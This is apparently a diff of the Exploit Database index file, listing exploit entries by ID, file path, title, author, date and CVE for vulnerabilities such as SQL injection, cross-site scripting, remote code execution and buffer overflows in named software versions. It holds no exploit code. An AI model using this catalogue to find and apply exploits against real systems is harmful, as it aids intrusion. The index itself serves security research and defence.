 51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info
 44719,exploits/php/webapps/44719.txt,"Online Store System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,,
 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,,2020-06-23,2020-06-23,0,,,,,,
@ -28482,6 +28495,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,,2020-12-14,2020-12-14,0,,,,,,
 49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,,2020-12-11,2021-02-18,0,CVE-2020-11819,,,,,
 48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,,2020-09-02,2021-02-18,0,CVE-2020-11819,,,,,
 51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
 45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip,
 46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip,
@ -28814,6 +28828,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35701,exploits/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",webapps,php,,2011-05-03,2015-01-05,1,,,,,,https://www.securityfocus.com/bid/47701/info
 34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",webapps,php,,2010-06-15,2014-07-23,1,,,,,,
 48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,,2020-05-13,2020-05-13,0,,,,,,
 51120,exploits/php/webapps/51120.txt,"Senayan Library Management System v9.5.0 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 2117,exploits/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,webapps,php,,2006-08-02,2016-08-31,1,OSVDB-27782,,,,http://www.exploit-db.comsendcard_3-4-0.tar.gz,
 3827,exploits/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,webapps,php,,2007-04-30,2016-09-30,1,OSVDB-35738;CVE-2007-2471,,,,http://www.exploit-db.comsendcard_3-4-1.tar.gz,
 4029,exploits/php/webapps/4029.php,"Sendcard 3.4.1 - Local File Inclusion / Remote Code Execution",2007-06-04,Silentz,webapps,php,,2007-06-03,,1,OSVDB-35741;CVE-2007-3082,,,,,
@ -29443,6 +29458,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23382,exploits/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,webapps,php,,2012-12-14,2012-12-14,1,OSVDB-88458,,,,http://www.exploit-db.comsocialsites.zip,
 33658,exploits/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,webapps,php,,2010-02-19,2014-06-07,1,,,,,,https://www.securityfocus.com/bid/38329/info
 10583,exploits/php/webapps/10583.txt,"social Web CMS Beta 2 - Multiple Vulnerabilities",2009-12-21,cp77fk4r,webapps,php,,2009-12-20,,1,OSVDB-61239;OSVDB-61238,,,,http://www.exploit-db.com1_SocialWebCMS_B2_RC1.zip,
 51116,exploits/php/webapps/51116.txt,"Social-Share-Buttons v2.2.3 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 34256,exploits/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload / Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php,,2010-07-05,2014-08-04,1,,,,,,https://www.securityfocus.com/bid/41396/info
 18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,,2012-02-16,2012-02-16,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip,
 17193,exploits/php/webapps/17193.html,"SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-04-20,vir0e5,webapps,php,,2011-04-20,2011-04-20,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip,
@ -29816,6 +29832,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49876,exploits/php/webapps/49876.py,"Subrion CMS 4.2.1 - Arbitrary File Upload",2021-05-17,"Fellipe Oliveira",webapps,php,,2021-05-17,2021-10-29,0,CVE-2018-19422,,,,,
 50737,exploits/php/webapps/50737.txt,"Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)",2022-02-11,"Aryan Chehreghani",webapps,php,,2022-02-11,2022-02-11,0,,,,,,
 45150,exploits/php/webapps/45150.txt,"Subrion CMS 4.2.1 - Cross-Site Scripting",2018-08-06,"Zeel Chavda",webapps,php,,2018-08-06,2018-08-08,0,CVE-2018-14840,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comsubrion_cms_4.2.1.zip,
 51110,exploits/php/webapps/51110.txt,"Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)",2023-03-28,"Sinem Şahin",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 26252,exploits/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,webapps,php,,2005-09-13,2013-06-17,1,CVE-2005-2952;OSVDB-19380,,,,,https://www.securityfocus.com/bid/14817/info
 22625,exploits/php/webapps/22625.txt,"SudBox Boutique 1.2 - 'login.php' Authentication Bypass",2003-05-21,frog,webapps,php,,2003-05-21,2012-11-11,1,,,,,,https://www.securityfocus.com/bid/7651/info
 10248,exploits/php/webapps/10248.txt,"Sugar CRM 5.5.0.rc2/5.2.0j - Multiple Vulnerabilities",2009-11-29,waraxe,webapps,php,,2009-11-28,,1,,,,,,
@ -33879,6 +33896,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",2021-10-04,"Jordan Glover",webapps,php,,2021-10-04,2021-10-04,0,,,,,,
 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80,2019-08-19,2019-08-19,0,CVE-2019-14430,"SQL Injection (SQLi)",,,http://www.exploit-db.comYouPHPTube-7.2.tar.gz,
 47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80,2019-08-30,2019-08-30,0,,,,,http://www.exploit-db.comYouPHPTube-7.4.tar.gz,
 51101,exploits/php/webapps/51101.txt,"YouPHPTube<= 7.8 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 33908,exploits/php/webapps/33908.txt,"Your Articles Directory - Login Option SQL Injection",2010-04-29,Sid3^effects,webapps,php,,2010-04-29,2014-06-28,1,,,,,,https://www.securityfocus.com/bid/39796/info
 38367,exploits/php/webapps/38367.txt,"Your Own Classifieds - Cross-Site Scripting",2013-03-08,"Rafay Baloch",webapps,php,,2013-03-08,2015-09-30,1,,,,,,https://www.securityfocus.com/bid/58399/info
 12785,exploits/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,webapps,php,,2010-05-27,,0,,,,,,
@ -34175,6 +34193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
 40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz,
 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,,
 50101,exploits/python/webapps/50101.py,"Pallets Werkzeug 0.15.4 - Path Traversal",2021-07-06,faisalfs10x,webapps,python,,2021-07-06,2021-07-06,0,CVE-2019-14322,,,,http://www.exploit-db.comwerkzeug-0.15.4.zip,
@ -38120,6 +38139,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 14236,exploits/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,dos,windows,8800,2010-07-06,2010-07-06,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14236.png,,
 4168,exploits/windows/dos/4168.vbs,"Sun Java WebStart - JNLP Stack Buffer Overflow (PoC)",2007-07-10,ZhenHan.Liu,dos,windows,,2007-07-09,2016-10-05,1,CVE-2007-3655,,,,,
 17885,exploits/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",dos,windows,,2011-09-23,2011-09-23,1,OSVDB-75800;OSVDB-75799;OSVDB-75798;OSVDB-75796;OSVDB-75795;OSVDB-75684,,,,,
 51102,exploits/windows/dos/51102.txt,"SuperMailer v11.20 - Buffer overflow DoS",2023-03-28,"Rafael Pedrero",dos,windows,,2023-03-28,2023-03-28,0,,,,,,
 38758,exploits/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,,,,,,
 38759,exploits/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,,,,,,
 38760,exploits/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field Overflow (SEH)",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,OSVDB-130627,,,,,
@ -38272,6 +38292,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9364,exploits/windows/dos/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,dos,windows,,2009-08-04,2017-04-01,1,OSVDB-64560;CVE-2009-4867,,,,,
 9671,exploits/windows/dos/9671.py,"Tuniac 090517c - '.pls' Local Crash (PoC)",2009-09-14,zAx,dos,windows,,2009-09-13,,1,OSVDB-58882;CVE-2009-3574,,,,,
 14689,exploits/windows/dos/14689.pl,"Tuniac 100723 - Denial of Service",2010-08-19,d4rk-h4ck3r,dos,windows,,2010-08-19,2010-08-19,1,,,,http://www.exploit-db.com/screenshots/idlt15000/14689.png,http://www.exploit-db.comTuniac_Setup_100723.exe,
 51114,exploits/windows/dos/51114.c,"Tunnel Interface Driver - Denial of Service",2023-03-28,ExAllocatePool2,dos,windows,,2023-03-28,2023-03-28,0,,,,,,
 11131,exploits/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote Denial of Service",2010-01-13,corelanc0d3r,dos,windows,,2010-01-12,2011-01-05,1,OSVDB-61671,,,http://www.exploit-db.com/screenshots/idlt11500/screen-shot-2011-01-04-at-83246-pm.png,http://www.exploit-db.comtbftpsrv1.00.712.exe,
 3341,exploits/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service Vulnerabilities",2007-02-20,Marsu,dos,windows,,2007-02-19,2016-09-27,1,OSVDB-33782;CVE-2007-1080;OSVDB-33752;CVE-2007-1075;OSVDB-33751,,,,,
 23254,exploits/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",dos,windows,,2012-12-09,2012-12-09,0,CVE-2012-5451;OSVDB-88274;OSVDB-88174,,,,http://www.exploit-db.comtvmobili-windows-i386.exe,https://www.htbridge.com/advisory/HTB23120
@ -38402,6 +38423,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40398,exploits/windows/dos/40398.txt,"VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow (PoC)",2016-09-19,"Google Security Research",dos,windows,,2016-09-19,2016-09-19,1,CVE-2016-7083,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=849
 42140,exploits/windows/dos/42140.c,"VMware Workstation 12 Pro - Denial of Service",2017-06-08,"Borja Merino",dos,windows,,2017-06-08,2017-06-08,1,CVE-2017-4916,,,,,
 44533,exploits/windows/dos/44533.c,"VMware Workstation 12.5.2 - Drag n Drop Use-After-Free (Pwn2Own 2017) (PoC)",2018-04-23,keenlab,dos,windows,,2018-04-25,2018-04-25,0,,Pwn2Own,,,,https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/
 51100,exploits/windows/dos/51100.txt,"VMware Workstation 15 Pro - Denial of Service",2023-03-28,"Milad karimi",dos,windows,,2023-03-28,2023-03-28,0,,,,,,
 6262,exploits/windows/dos/6262.txt,"VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service",2008-08-18,g_,dos,windows,,2008-08-17,2016-12-20,1,OSVDB-48051;CVE-2008-3761,,,,,
 15103,exploits/windows/dos/15103.py,"VMware Workstation 7.1.1 - 'VMkbd.sys' Denial of Service",2010-09-25,"Lufeng Li",dos,windows,,2010-09-25,2010-09-26,1,,,,,,
 21170,exploits/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 - Game Server/Client Denial of Service",2001-12-07,sh0,dos,windows,,2001-12-07,2012-09-09,1,CVE-2001-0952;OSVDB-10605,,,,,https://www.securityfocus.com/bid/3651/info
@ -39615,6 +39637,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19192,exploits/windows/local/19192.txt,"Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords",1999-02-09,"Russ Cooper",local,windows,,1999-02-09,2012-06-16,1,CVE-1999-0372;OSVDB-11490,,,,,https://www.securityfocus.com/bid/228/info
 38504,exploits/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,local,windows,,2015-10-21,2015-10-21,0,OSVDB-129366,,,,http://www.exploit-db.comHandyPassword.exe,
 50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",2021-12-06,"Mert Daş",local,windows,,2021-12-06,2021-12-06,0,,,,,,
 51105,exploits/windows/local/51105.txt,"HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path",2023-03-28,"Jorge Manuel Lozano Gómez",local,windows,,2023-03-28,2023-03-28,0,,,,,,
 37737,exploits/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,local,windows,,2015-08-07,2015-08-07,1,OSVDB-125529,"Metasploit Framework (MSF)",,,http://www.exploit-db.comHoMM3_HD_Latest.exe,
 37716,exploits/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",local,windows,,2015-07-29,2015-08-07,1,,,,,http://www.exploit-db.comHoMM3_HD_Latest.exe,
 39820,exploits/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows,,2016-05-16,2016-05-16,0,,,,,,
@ -40908,6 +40931,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows,,2017-06-05,2018-07-20,1,CVE-2017-9355,,,http://www.exploit-db.com/screenshots/idlt42500/42119.png,http://www.exploit-db.comSubsonic.exe,
 17225,exploits/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' File Buffer Overflow (SEH Unicode) (Metasploit)",2011-04-28,Metasploit,local,windows,,2011-04-29,2011-04-29,1,OSVDB-72050,"Metasploit Framework (MSF)",,,http://www.exploit-db.comSubtitleProcessor771.zip,
 17217,exploits/windows/local/17217.py,"Subtitle Processor 7.7.1 - Local Buffer Overflow (SEH Unicode)",2011-04-27,"Brandon Murphy",local,windows,,2011-04-27,2011-04-27,1,OSVDB-72050,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-04-26-at-82906-pm.png,http://www.exploit-db.comSubtitleProcessor771.zip,
 51106,exploits/windows/local/51106.txt,"SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path",2023-03-28,"Jorge Manuel Lozano Gómez",local,windows,,2023-03-28,2023-03-28,0,,,,,,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,,2017-03-23,2017-03-23,1,CVE-2010-1423;CVE-2010-0886;OSVDB-63648,,,,,https://github.com/rapid7/metasploit-framework/blob/b08d1ad8d8d6c0f5cb63cc44e3ff75efb9edb7b3/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
 27041,exploits/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Buffer Overflow",2013-07-23,jun,local,windows,,2013-07-23,2013-08-05,1,,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-05-at-50823-pm.png,http://www.exploit-db.comsetup_3500.exe,
 13767,exploits/windows/local/13767.c,"SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow",2010-06-08,mr_me,local,windows,,2010-06-07,,1,,,,,,